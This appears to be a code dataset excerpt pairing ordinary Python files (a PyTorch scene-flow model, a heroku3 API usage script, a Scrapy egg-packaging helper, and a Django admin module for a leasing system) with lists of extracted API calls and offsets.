25, 0, 31, tzinfo=UTC)\n', (6895, 6927), True, 'import datetime as dt\n'), ((7010, 7053), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(30)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 30, tzinfo=UTC)\n', (7021, 7053), True, 'import datetime as dt\n'), ((7086, 7128), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(26)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 26, 0, 0, tzinfo=UTC)\n', (7097, 7128), True, 'import datetime as dt\n'), ((7211, 7253), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(1)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 1, 0, tzinfo=UTC)\n', (7222, 7253), True, 'import datetime as dt\n'), ((7285, 7327), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(20)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 20, 0, 0, tzinfo=UTC)\n', (7296, 7327), True, 'import datetime as dt\n'), ((7410, 7452), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 0, tzinfo=UTC)\n', (7421, 7452), True, 'import datetime as dt\n'), ((4967, 4991), 'datetime.timedelta', 'dt.timedelta', ([], {'minutes': '(30)'}), '(minutes=30)\n', (4979, 4991), True, 'import datetime as dt\n')]
|
import torch
import torch.nn as nn
from model.extractor import FlotEncoder
from model.corr import CorrBlock
from model.update import UpdateBlock
from model.refine import FlotRefine
class RSF(nn.Module):
def __init__(self, args):
super(RSF, self).__init__()
self.hidden_dim = 64
self.context_dim = 64
self.feature_extractor = FlotEncoder()
self.context_extractor = FlotEncoder()
self.corr_block = CorrBlock(num_levels=args.corr_levels, base_scale=args.base_scales,
resolution=3, truncate_k=args.truncate_k)
self.update_block = UpdateBlock(hidden_dim=self.hidden_dim)
# self.refine_block = FlotRefine()
def forward(self, p, num_iters=12):
# feature extraction
[xyz1, xyz2] = p
fmap1, graph = self.feature_extractor(p[0])
fmap2, _ = self.feature_extractor(p[1])
# correlation matrix
self.corr_block.init_module(fmap1, fmap2, xyz2)
fct1, graph_context = self.context_extractor(p[0])
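        # Split the context features into an initial hidden state (tanh) and a
        # static input feature map (relu), mirroring RAFT-style update blocks.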
net, inp = torch.split(fct1, [self.hidden_dim, self.context_dim], dim=1)
net = torch.tanh(net)
inp = torch.relu(inp)
coords1, coords2 = xyz1, xyz1
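        # Both coordinate sets start at the source points, so the initial flow
        # estimate (coords2 - coords1) is zero and is refined over num_iters steps.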
flow_predictions = []
for itr in range(num_iters):
coords2 = coords2.detach()
corr = self.corr_block(coords=coords2)
flow = coords2 - coords1
net, delta_flow = self.update_block(net, inp, corr, flow, graph_context)
coords2 = coords2 + delta_flow
flow_predictions.append(coords2 - coords1)
# refined_flow = self.refine_block(coords2 - coords1, graph)
# flow_predictions.append(refined_flow)
return flow_predictions
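# Hedged usage sketch; the hyper-parameter values and the (batch, points, 3)
# point-cloud layout below are assumptions for illustration, not taken from
# the original repository.
if __name__ == '__main__':
    from types import SimpleNamespace
    args = SimpleNamespace(corr_levels=3, base_scales=0.25, truncate_k=128)
    model = RSF(args)
    xyz1 = torch.rand(2, 8192, 3)  # assumed source point clouds
    xyz2 = torch.rand(2, 8192, 3)  # assumed target point clouds
    flows = model([xyz1, xyz2], num_iters=8)
    print(len(flows), flows[-1].shape)  # one flow prediction per iteration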
|
[
"torch.relu",
"model.update.UpdateBlock",
"model.extractor.FlotEncoder",
"torch.split",
"model.corr.CorrBlock",
"torch.tanh"
] |
[((364, 377), 'model.extractor.FlotEncoder', 'FlotEncoder', ([], {}), '()\n', (375, 377), False, 'from model.extractor import FlotEncoder\n'), ((411, 424), 'model.extractor.FlotEncoder', 'FlotEncoder', ([], {}), '()\n', (422, 424), False, 'from model.extractor import FlotEncoder\n'), ((451, 564), 'model.corr.CorrBlock', 'CorrBlock', ([], {'num_levels': 'args.corr_levels', 'base_scale': 'args.base_scales', 'resolution': '(3)', 'truncate_k': 'args.truncate_k'}), '(num_levels=args.corr_levels, base_scale=args.base_scales,\n resolution=3, truncate_k=args.truncate_k)\n', (460, 564), False, 'from model.corr import CorrBlock\n'), ((625, 664), 'model.update.UpdateBlock', 'UpdateBlock', ([], {'hidden_dim': 'self.hidden_dim'}), '(hidden_dim=self.hidden_dim)\n', (636, 664), False, 'from model.update import UpdateBlock\n'), ((1069, 1130), 'torch.split', 'torch.split', (['fct1', '[self.hidden_dim, self.context_dim]'], {'dim': '(1)'}), '(fct1, [self.hidden_dim, self.context_dim], dim=1)\n', (1080, 1130), False, 'import torch\n'), ((1145, 1160), 'torch.tanh', 'torch.tanh', (['net'], {}), '(net)\n', (1155, 1160), False, 'import torch\n'), ((1175, 1190), 'torch.relu', 'torch.relu', (['inp'], {}), '(inp)\n', (1185, 1190), False, 'import torch\n')]
|
# coding=utf-8
import os
from pprint import pprint # noqa
# Third party libraries
import heroku3
# import socket
# import httplib
# import logging
# httplib.HTTPConnection.debuglevel = 1
# logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from requests
# logging.getLogger().setLevel(logging.INFO)
# requests_log = logging.getLogger("requests.packages.urllib3")
# requests_log.setLevel(logging.INFO)
# requests_log.propagate = True
HEROKU_API_KEY = os.environ.get("HEROKU_API_KEY", False)
HEROKU_APPNAME = os.environ.get("HEROKU_APPNAME", False)
TEST_EMAIL = os.environ.get("TEST_EMAIL", False)
heroku_conn = heroku3.from_key(HEROKU_API_KEY)
# app = heroku_conn.create_app(name='testy2124app', stack_id_or_name='cedar', region_id_or_name='us')
# print(app.addons())
# print(heroku_conn.addons('testy123app'))
# for addon in app.addons():
# addon.delete()
# del config['TEST1']
# del config['TEST2']
# del config['TEST3']
# del config['Z01']
# del config['Z02']
# print(config)
# config['TEST1'] = u'MM1'
# config['TEST2'] = u'MM2'
# config['TEST3'] = u'MM3'
# config2 = heroku_conn.update_appconfig('testy123app', {u'Z01': u'A1', u'Z02': u'A2'})
# config2 = config.update({u'Z01': u'A1', u'Z02': u'A2'})
# config3 = app.config()
# print(config)
# print("======")
# print(config2)
# print("======")
# print(config3)
# print(config['TEST1'])
# print(config['TEST3'])
# app = heroku_conn.app('kdsjhkszdjhgksjdhfkj')
# procs = app.process_formation()
# proc = app.process_formation()['web']
# print(proc.size)
# print(proc.quantity)
# print(procs)
# proc.scale(0)
# app.scale_formation_process('web', 1)
# output = app.run_command('pgbackups:url')
# collab = app.add_collaborator(email=TEST_EMAIL, silent=False)
# collab = app.remove_collaborator(TEST_EMAIL)
# print(newapp.collaborators())
# config = newapp.config()
# config['TEST2'] = None
# print(newapp.domains())
# domain2 = newapp.add_domain('testy123.testing.com')
# print(newapp.domains())
# newapp.remove_domain('testy123.testing.com')
# domain.remove()
# print(newapp.domains())
# app = heroku_conn.app(HEROKU_APPNAME)
# pprint(app.addons())
# dynos = app.dynos()
# dyno = dynos['web.1']
# print(dyno)
# releases = app.releases(sort='asc')
# for release in releases:
# print("{0} {1} {2} {3}".format(release.id, release.commit, release.user, release.description))
# releases = app.releases()._items.reverse()
# print(releases.pop())
# print(releases.pop())
# app.rollback('v108')
# apps = heroku_conn.apps(order_by='name', limit=1, sort='asc')
# apps = heroku_conn.apps(order_by='name', limit=1)
apps = heroku_conn.apps(order_by="name", sort="asc")
for app in apps:
print(app.name)
# app.rename('testy223')
# print(app.enable_maintenance_mode())
# print(app.disable_maintenance_mode())
# app.enable_feature('user-env-compile')
# app.disable_feature('user-env-compile')
# print(app.labs())
# print(heroku_conn.features())
# domain = app.add_domain('test123-1.testing.com')
# domain = app.add_domain('test123-2.testing.com')
# domain = app.add_domain('test123-3.testing.com')
# domain = app.add_domain('test123-4.testing.com')
# domain = app.add_domain('test123-5.testing.com')
# domain = app.add_domain('test123-6.testing.com')
# domain = app.add_domain('test123-7.testing.com')
# iterator = app.stream_log(lines=1)
# for line in iterator:
# filter out keep-alive new lines
# if line:
# print("{0}".format(line))
# logs = app.get_log(lines=100)
# print(logs)
# print(app.domains(limit=1))
# dyno = app.run_command('fab -l', printout=True)
# dyno.remove()
# proc = heroku_conn.apps()['testy123app'].process_formation()['web']
# print(proc.size)
# print(proc.quantity)
# formations = app.process_formation()
# print(formations['web'])
# for formation in formations:
# formation.resize(1)
# print(app._h._last_request_id)
# print(app.dynos()['web.1'])
# print(dynos['web.1'])
# print(heroku_conn.apps()['testy123app'])
# print(heroku_conn.apps()['d32b74d8-f5cf-4e3e-95dd-a601668fdb0c'])
# for dyno in app.dynos():
# print(dyno)
# print(dyno.command)
# dyno.restart()
# app.restart()
# del config['TEST2']
# newapp.remove_collaborator('<EMAIL>')
# collab.remove()
# pprint(newapp.addons)
# app = heroku_conn.app('testy123app')
# for addon in app.addons:
# print(addon.app.name, " - ", addon.plan.name)
# addons = heroku_conn.addon_services()
# pprint(addons)
# pg_addon = heroku_conn.addon_services('6235c964-8b3c-47e0-952f-8d8f6a2d53f5')
# pg_addon = heroku_conn.addon_services(id_or_name='heroku-postgresql')
# pprint(pg_addon)
# for addon in addons:
# print(addon.name, " - ", addon.id, " - ", addon.id, " - ", addon.price)
# addon.upgrade(plan_id_or_name='heroku-postgresql:basic')
# addon.delete()
# buildpack_urls = [
# 'https://github.com/some/buildpack', 'https://github.com/another/buildpack'
# ]
# app.update_buildpacks([buildpack_urls])
# buildpack_urls can also be empty. This clears all buildpacks:
# app.update_buildpacks([])
# app.delete()
print(heroku_conn._last_request_id)
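# A condensed sketch of the config workflow exercised piecemeal above;
# 'my-app' is a placeholder name, not one of the apps used in this file.
# app = heroku_conn.apps()['my-app']
# config = app.config()           # behaves like a dict of config vars
# config['FEATURE_FLAG'] = 'on'   # assignment pushes the new value to Heroku
# del config['FEATURE_FLAG']      # deletion removes the config var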
|
[
"os.environ.get",
"heroku3.from_key"
] |
[((496, 535), 'os.environ.get', 'os.environ.get', (['"""HEROKU_API_KEY"""', '(False)'], {}), "('HEROKU_API_KEY', False)\n", (510, 535), False, 'import os\n'), ((553, 592), 'os.environ.get', 'os.environ.get', (['"""HEROKU_APPNAME"""', '(False)'], {}), "('HEROKU_APPNAME', False)\n", (567, 592), False, 'import os\n'), ((606, 641), 'os.environ.get', 'os.environ.get', (['"""TEST_EMAIL"""', '(False)'], {}), "('TEST_EMAIL', False)\n", (620, 641), False, 'import os\n'), ((657, 689), 'heroku3.from_key', 'heroku3.from_key', (['HEROKU_API_KEY'], {}), '(HEROKU_API_KEY)\n', (673, 689), False, 'import heroku3\n')]
|
from scrapy.utils.python import retry_on_eintr
from scrapy.utils.conf import get_config, closest_scrapy_cfg
import os
import sys
import glob
from subprocess import check_call
_SETUP_PY_TEMPLATE = """
# Automatically created by: scrapydd
from setuptools import setup, find_packages
setup(
name = '%(project)s',
version = '1.0',
packages = find_packages(),
entry_points = {'scrapy': ['settings = %(settings)s']},
install_requires = [],
)
""".lstrip()
def _create_default_setup_py(**kwargs):
with open('setup.py', 'w') as f:
f.write(_SETUP_PY_TEMPLATE % kwargs)
def _build_egg():
    # locate the nearest scrapy.cfg and work from the project root
    closest = closest_scrapy_cfg()
    os.chdir(os.path.dirname(closest))
if not os.path.exists('setup.py'):
scrapy_project_settings = get_config()
settings = scrapy_project_settings.get('settings', 'default')
project = scrapy_project_settings.get('deploy', 'project')
_create_default_setup_py(settings=settings, project=project)
d = 'dist'
retry_on_eintr(check_call, [sys.executable, 'setup.py', 'clean', '-a', 'bdist_egg', '-d', d],
stdout=sys.stdout, stderr=sys.stderr)
egg = glob.glob(os.path.join(d, '*.egg'))[0]
return egg, d
class PackageCommand:
def run(self):
egg, d = _build_egg()
print("Egg has been built: %s" % egg)
|
[
"scrapy.utils.conf.closest_scrapy_cfg",
"scrapy.utils.python.retry_on_eintr",
"os.path.dirname",
"os.path.exists",
"scrapy.utils.conf.get_config",
"os.path.join"
] |
[((667, 687), 'scrapy.utils.conf.closest_scrapy_cfg', 'closest_scrapy_cfg', ([], {}), '()\n', (685, 687), False, 'from scrapy.utils.conf import get_config, closest_scrapy_cfg\n'), ((1046, 1181), 'scrapy.utils.python.retry_on_eintr', 'retry_on_eintr', (['check_call', "[sys.executable, 'setup.py', 'clean', '-a', 'bdist_egg', '-d', d]"], {'stdout': 'sys.stdout', 'stderr': 'sys.stderr'}), "(check_call, [sys.executable, 'setup.py', 'clean', '-a',\n 'bdist_egg', '-d', d], stdout=sys.stdout, stderr=sys.stderr)\n", (1060, 1181), False, 'from scrapy.utils.python import retry_on_eintr\n'), ((702, 726), 'os.path.dirname', 'os.path.dirname', (['closest'], {}), '(closest)\n', (717, 726), False, 'import os\n'), ((740, 766), 'os.path.exists', 'os.path.exists', (['"""setup.py"""'], {}), "('setup.py')\n", (754, 766), False, 'import os\n'), ((803, 815), 'scrapy.utils.conf.get_config', 'get_config', ([], {}), '()\n', (813, 815), False, 'from scrapy.utils.conf import get_config, closest_scrapy_cfg\n'), ((1219, 1243), 'os.path.join', 'os.path.join', (['d', '"""*.egg"""'], {}), "(d, '*.egg')\n", (1231, 1243), False, 'import os\n')]
|
from django.contrib.gis import admin
from django.utils.translation import ugettext_lazy as _
from enumfields.admin import EnumFieldListFilter
from field_permissions.admin import FieldPermissionsAdminMixin
from leasing.models import (
Area,
AreaNote,
AreaSource,
BankHoliday,
BasisOfRent,
BasisOfRentBuildPermissionType,
BasisOfRentDecision,
BasisOfRentPlotType,
BasisOfRentPropertyIdentifier,
BasisOfRentRate,
Collateral,
CollateralType,
CollectionCourtDecision,
CollectionLetter,
CollectionLetterTemplate,
CollectionNote,
Comment,
CommentTopic,
Condition,
ConditionType,
ConstructabilityDescription,
Contact,
Contract,
ContractChange,
ContractRent,
ContractType,
Decision,
DecisionMaker,
DecisionType,
District,
Financing,
FixedInitialYearRent,
Hitas,
Index,
Inspection,
IntendedUse,
InterestRate,
Invoice,
Lease,
LeaseArea,
LeaseBasisOfRent,
LeaseholdTransfer,
LeaseholdTransferImportLog,
LeaseholdTransferParty,
LeaseholdTransferProperty,
LeaseIdentifier,
LeaseStateLog,
LeaseType,
Management,
Municipality,
NoticePeriod,
PlanUnit,
PlanUnitState,
PlanUnitType,
Plot,
PlotSearch,
PlotSearchStage,
PlotSearchSubtype,
PlotSearchType,
ReceivableType,
Regulation,
RelatedLease,
Rent,
RentAdjustment,
RentDueDate,
RentIntendedUse,
SpecialProject,
StatisticalUse,
SupportiveHousing,
Tenant,
TenantContact,
UiData,
Vat,
)
from leasing.models.infill_development_compensation import (
InfillDevelopmentCompensation,
InfillDevelopmentCompensationAttachment,
InfillDevelopmentCompensationDecision,
InfillDevelopmentCompensationIntendedUse,
InfillDevelopmentCompensationLease,
)
from leasing.models.invoice import InvoiceNote, InvoicePayment, InvoiceRow, InvoiceSet
from leasing.models.land_area import (
LeaseAreaAddress,
PlanUnitIntendedUse,
PlotDivisionState,
)
from leasing.models.land_use_agreement import (
LandUseAgreement,
LandUseAgreementAddress,
LandUseAgreementConditionFormOfManagement,
LandUseAgreementDecision,
LandUseAgreementDecisionCondition,
LandUseAgreementDecisionConditionType,
LandUseAgreementDecisionType,
LandUseAgreementDefinition,
LandUseAgreementStatus,
LandUseAgreementType,
)
from leasing.models.lease import ReservationProcedure
class CenterOnHelsinkiOSMGeoAdmin(admin.OSMGeoAdmin):
# Position 24.945, 60.192 (SRID 4326) transformed to SRID 900913
default_lon = 2776864.697838209
default_lat = 8442609.191245062
default_zoom = 11
class AreaNoteAdmin(FieldPermissionsAdminMixin, CenterOnHelsinkiOSMGeoAdmin):
pass
class FieldPermissionsModelAdmin(FieldPermissionsAdminMixin, admin.ModelAdmin):
pass
class NameAdmin(FieldPermissionsModelAdmin):
list_display = ("name",)
search_fields = ["name"]
class AreaAdmin(CenterOnHelsinkiOSMGeoAdmin):
list_display = ("identifier", "type", "source")
list_filter = (("type", EnumFieldListFilter), "source")
search_fields = ["identifier"]
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related("source")
class AreaSourceAdmin(admin.ModelAdmin):
list_display = ("name", "identifier")
search_fields = ["name", "identifier"]
class ContactAdmin(FieldPermissionsModelAdmin):
list_display = ("__str__", "type", "is_lessor")
search_fields = ["first_name", "last_name", "name"]
class MunicipalityAdmin(admin.ModelAdmin):
list_display = ("name", "identifier")
search_fields = ["name", "identifier"]
readonly_fields = ("id",)
class DistrictAdmin(admin.ModelAdmin):
list_display = ("name", "municipality", "identifier")
search_fields = ["name", "municipality__name", "identifier"]
class TenantContactAdmin(FieldPermissionsModelAdmin):
list_display = ("get_lease_identifier", "tenant", "type", "contact")
raw_id_fields = ("tenant", "contact")
def get_lease_identifier(self, obj):
return str(obj.tenant.lease)
get_lease_identifier.short_description = _("Lease")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"tenant",
"contact",
"tenant__lease__type",
"tenant__lease__municipality",
"tenant__lease__district",
"tenant__lease__identifier",
"tenant__lease__identifier__type",
"tenant__lease__identifier__municipality",
"tenant__lease__identifier__district",
)
class TenantContactInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = TenantContact
extra = 0
class TenantAdmin(FieldPermissionsModelAdmin):
list_display = ("lease",)
inlines = [TenantContactInline]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class RelatedLeaseInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = RelatedLease
fk_name = "from_lease"
raw_id_fields = ("from_lease", "to_lease")
extra = 0
class LeaseBasisOfRentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = LeaseBasisOfRent
extra = 0
class LeaseIdentifierAdmin(FieldPermissionsModelAdmin):
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related("type", "municipality", "district")
class LeaseAdmin(FieldPermissionsAdminMixin, admin.ModelAdmin):
inlines = [RelatedLeaseInline, LeaseBasisOfRentInline]
raw_id_fields = ("identifier",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"type",
"municipality",
"district",
"identifier",
"identifier__type",
"identifier__municipality",
"identifier__district",
)
class CollectionCourtDecisionAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "file", "uploaded_at", "uploader")
raw_id_fields = ("lease",)
ordering = ("-uploaded_at",)
class CollectionLetterAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "file", "uploaded_at", "uploader")
raw_id_fields = ("lease",)
ordering = ("-uploaded_at",)
class CollectionNoteAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "created_at", "note", "user")
raw_id_fields = ("lease",)
ordering = ("-created_at",)
class CollectionLetterTemplateAdmin(admin.ModelAdmin):
list_display = ("name", "modified_at")
ordering = ("name",)
class CommentAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "topic", "user", "created_at", "modified_at")
raw_id_fields = ("lease",)
class ContractChangeInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = ContractChange
extra = 0
class CollateralInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = Collateral
extra = 0
class ContractAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "type", "contract_number")
inlines = [ContractChangeInline, CollateralInline]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"type",
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class ConditionInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = Condition
extra = 0
class DecisionAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "reference_number", "decision_maker", "type")
inlines = [ConditionInline]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"decision_maker",
"type",
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class DecisionTypeAdmin(NameAdmin):
list_display = ("name", "kind")
class InspectionAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "inspector", "supervision_date", "supervised_date")
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class LeaseTypeAdmin(admin.ModelAdmin):
list_display = ("name", "identifier", "id")
search_fields = ["name", "identifier", "id"]
ordering = ("identifier",)
class RentDueDateInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = RentDueDate
extra = 0
class FixedInitialYearRentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = FixedInitialYearRent
extra = 0
class ContractRentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = ContractRent
extra = 0
class RentAdjustmentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = RentAdjustment
extra = 0
class RentAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "type")
inlines = [
RentDueDateInline,
FixedInitialYearRentInline,
ContractRentInline,
RentAdjustmentInline,
]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class BasisOfRentPropertyIdentifierInline(
FieldPermissionsAdminMixin, admin.TabularInline
):
model = BasisOfRentPropertyIdentifier
extra = 0
class BasisOfRentDecisionInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = BasisOfRentDecision
extra = 0
class BasisOfRentRateInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = BasisOfRentRate
extra = 0
class BasisOfRentAdmin(FieldPermissionsModelAdmin):
list_display = ("id", "plot_type", "management", "financing")
inlines = [
BasisOfRentPropertyIdentifierInline,
BasisOfRentDecisionInline,
BasisOfRentRateInline,
]
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"plot_type", "management", "financing", "index"
).prefetch_related(
"rent_rates",
"property_identifiers",
"decisions",
"decisions__decision_maker",
)
class IndexAdmin(admin.ModelAdmin):
list_display = ("year", "month", "number")
class InfillDevelopmentCompensationAdmin(FieldPermissionsModelAdmin):
list_display = ("name", "reference_number", "state")
class InfillDevelopmentCompensationDecisionInline(
FieldPermissionsAdminMixin, admin.StackedInline
):
model = InfillDevelopmentCompensationDecision
extra = 0
class InfillDevelopmentCompensationIntendedUseInline(
FieldPermissionsAdminMixin, admin.StackedInline
):
model = InfillDevelopmentCompensationIntendedUse
extra = 0
class InfillDevelopmentCompensationAttachmentInline(
FieldPermissionsAdminMixin, admin.StackedInline
):
model = InfillDevelopmentCompensationAttachment
extra = 0
class InfillDevelopmentCompensationLeaseAdmin(FieldPermissionsModelAdmin):
raw_id_fields = ("lease",)
inlines = [
InfillDevelopmentCompensationDecisionInline,
InfillDevelopmentCompensationIntendedUseInline,
InfillDevelopmentCompensationAttachmentInline,
]
list_display = ("infill_development_compensation", "lease")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class InterestRateAdmin(admin.ModelAdmin):
list_display = ("start_date", "end_date", "reference_rate", "penalty_rate")
ordering = ("-start_date", "-end_date")
class InvoicePaymentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = InvoicePayment
extra = 0
class InvoiceRowInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = InvoiceRow
extra = 0
raw_id_fields = ("tenant",)
class InvoiceAdmin(FieldPermissionsModelAdmin):
list_display = (
"lease",
"due_date",
"billing_period_start_date",
"billing_period_end_date",
"total_amount",
)
inlines = [InvoiceRowInline, InvoicePaymentInline]
raw_id_fields = ("lease", "invoiceset", "credited_invoice", "interest_invoice_for")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class InvoiceSetAdmin(admin.ModelAdmin):
list_display = ("lease", "billing_period_start_date", "billing_period_end_date")
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class InvoiceNoteAdmin(admin.ModelAdmin):
list_display = (
"lease",
"billing_period_start_date",
"billing_period_end_date",
"notes",
)
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class ConstructabilityDescriptionInline(
FieldPermissionsAdminMixin, admin.TabularInline
):
model = ConstructabilityDescription
extra = 0
class PlotInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = Plot
extra = 0
class PlanUnitInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = PlanUnit
extra = 0
class LeaseAreaAddressInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = LeaseAreaAddress
extra = 0
class LeaseAreaAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "type")
inlines = [
LeaseAreaAddressInline,
ConstructabilityDescriptionInline,
PlotInline,
PlanUnitInline,
]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class PlotAdmin(FieldPermissionsModelAdmin):
list_display = ("lease_area", "type")
raw_id_fields = ("lease_area",)
class LeaseStateLogAdmin(admin.ModelAdmin):
list_display = ("lease", "state")
raw_id_fields = ("lease",)
readonly_fields = ("created_at", "modified_at")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class PlanUnitAdmin(FieldPermissionsModelAdmin):
list_display = ("get_lease_identifier", "lease_area")
raw_id_fields = ("lease_area",)
def get_lease_identifier(self, obj):
return str(obj.lease_area.lease)
get_lease_identifier.short_description = _("Lease")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related("lease_area", "lease_area__lease")
class PlotSearchAdmin(FieldPermissionsAdminMixin, admin.ModelAdmin):
list_display = ("name",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related("subtype", "stage",)
class VatAdmin(admin.ModelAdmin):
list_display = ("percent", "start_date", "end_date")
class UiDataAdmin(admin.ModelAdmin):
list_display = ("user", "key")
list_filter = ("user", "key")
ordering = ("-user",)
class ReadOnlyTabularInline(admin.TabularInline):
can_delete = False
def has_add_permission(self, request, obj=None):
return False
def has_change_permission(self, request, obj=None):
return False
class LeaseholdTransferPartyInline(ReadOnlyTabularInline):
model = LeaseholdTransferParty
class LeaseholdTransferPropertyInline(ReadOnlyTabularInline):
model = LeaseholdTransferProperty
class LeaseholdTransferAdmin(admin.ModelAdmin):
inlines = [LeaseholdTransferPartyInline, LeaseholdTransferPropertyInline]
readonly_fields = ("institution_identifier", "decision_date")
class LeaseholdTransferImportLogAdmin(admin.ModelAdmin):
list_display = ("file_name", "created_at", "modified_at")
readonly_fields = ("created_at", "modified_at")
ordering = ("id",)
class LandUseAgreementAddressInline(admin.TabularInline):
model = LandUseAgreementAddress
extra = 0
class LandUseAgreementDecisionConditionInline(
FieldPermissionsAdminMixin, admin.StackedInline
):
model = LandUseAgreementDecisionCondition
extra = 0
class LandUseAgreementDecisionAdmin(admin.ModelAdmin):
inlines = [LandUseAgreementDecisionConditionInline]
class LandUseAgreementAdmin(admin.ModelAdmin):
inlines = [LandUseAgreementAddressInline]
admin.site.register(Area, AreaAdmin)
admin.site.register(AreaSource, AreaSourceAdmin)
admin.site.register(AreaNote, AreaNoteAdmin)
admin.site.register(BankHoliday)
admin.site.register(Contact, ContactAdmin)
admin.site.register(Comment, CommentAdmin)
admin.site.register(CommentTopic, NameAdmin)
admin.site.register(CollateralType, NameAdmin)
admin.site.register(CollectionCourtDecision, CollectionCourtDecisionAdmin)
admin.site.register(CollectionLetter, CollectionLetterAdmin)
admin.site.register(CollectionLetterTemplate, CollectionLetterTemplateAdmin)
admin.site.register(CollectionNote, CollectionNoteAdmin)
admin.site.register(District, DistrictAdmin)
admin.site.register(Financing, NameAdmin)
admin.site.register(Hitas, NameAdmin)
admin.site.register(Index, IndexAdmin)
admin.site.register(InfillDevelopmentCompensation, InfillDevelopmentCompensationAdmin)
admin.site.register(
InfillDevelopmentCompensationLease, InfillDevelopmentCompensationLeaseAdmin
)
admin.site.register(IntendedUse, NameAdmin)
admin.site.register(InterestRate, InterestRateAdmin)
admin.site.register(Inspection, InspectionAdmin)
admin.site.register(Invoice, InvoiceAdmin)
admin.site.register(InvoiceNote, InvoiceNoteAdmin)
admin.site.register(InvoiceSet, InvoiceSetAdmin)
admin.site.register(Lease, LeaseAdmin)
admin.site.register(LeaseArea, LeaseAreaAdmin)
admin.site.register(LeaseIdentifier, LeaseIdentifierAdmin)
admin.site.register(LeaseStateLog, LeaseStateLogAdmin)
admin.site.register(LeaseType, LeaseTypeAdmin)
admin.site.register(LeaseholdTransfer, LeaseholdTransferAdmin)
admin.site.register(LeaseholdTransferImportLog, LeaseholdTransferImportLogAdmin)
admin.site.register(Management, NameAdmin)
